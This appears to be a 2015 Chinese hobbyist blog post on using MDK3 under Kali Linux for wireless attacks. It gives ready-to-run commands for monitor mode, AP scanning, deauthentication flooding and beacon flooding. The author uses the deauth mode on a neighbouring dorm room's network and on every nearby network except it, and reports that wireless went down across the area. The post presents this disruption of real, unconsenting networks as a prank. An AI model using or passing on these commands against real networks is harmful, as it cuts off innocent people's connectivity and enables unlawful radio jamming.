用MDK3搞点坏坏的东西

Published on 2015 - 06 - 25

运行环境&硬件

Win10预览版下的虚拟机跑kali,MDK3自带;

树莓派2下跑卡里Kali,需要apt-get mdk3 ;如果用 Raspbian 系统,则需要自己编译 aircrack-ng 和 mdk3 。

无线网卡用的RTL8187L,Linux下免驱。

使用

首先,查看无线网卡

ifconfig

将无线网卡调到监听模式:

airmon-ng start wlan1

这时候会看到,已经调到监听模式mon0了。

扫描热点:

airodump-ng mon0

记下热点的BSSID(Mac地址)。

亲测觉得两种模式比较有效:

伪造断开连接(Deauthentication / Disassociation Amok Mode)

在这个模式下,软件会向周围所有可见AP不断发出“断开连接”的包……可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击!作用就是,没有设备连得上附近的WiFi了。

mdk3 mon0 d

  –w <filename>             #白名单mac地址列表文件

  –b <filename>             #黑名单mac地址列表文件

  –s <pps>                  #速率,这个模式下默认无限制

  –c [chan,chan,chan,…]    #信道,可以多填,如 2,4,5,1

比方说,想攻击我们寝室的642,只需输入:

echo 642_mac_address > 642
mdk3 mon0 d -b 642

就可以了。

同理,想攻击附近除了642之外的所有网络:

mdk3 mon0 d -w 642

亲测可以造成附近一定范围内的网络瘫痪……

洪水热点伪造(Beacon Flood Mode)

这个模式的攻击性不强,但是很好玩。

mdk3 mon0 b
    -n <ssid> 指定SSID名称,否则自动生成;
    -f <filename> 从指定文件读取SSID名称;
    -v <filename> 从指定文件名读取SSID和mac地址;
    -d 设置热点为Ad-Hoc;
    -w 设置WEP模式(加密热点);
    -g 54 Mbit 模式;
    -t 使用WPA TKIP加密;
    -a 使用WPA AES加密;
    -m 使用OUI数据库里的有效mac地址;
    -c <chan> 频道;
    -s <pps> 每秒发包率(默认50)。

我想让周围的热点变成一首海子的诗,于是:

mdk3 mon0 b -a -m -s 1000 -f answer

效果是这样的:

顺序乱了,作为一首诗是没法读了,不过也没有办法啦。

PS.这个模式下,我的无线鼠标、键盘有点点卡困了……毕竟都是2.4G下嘛……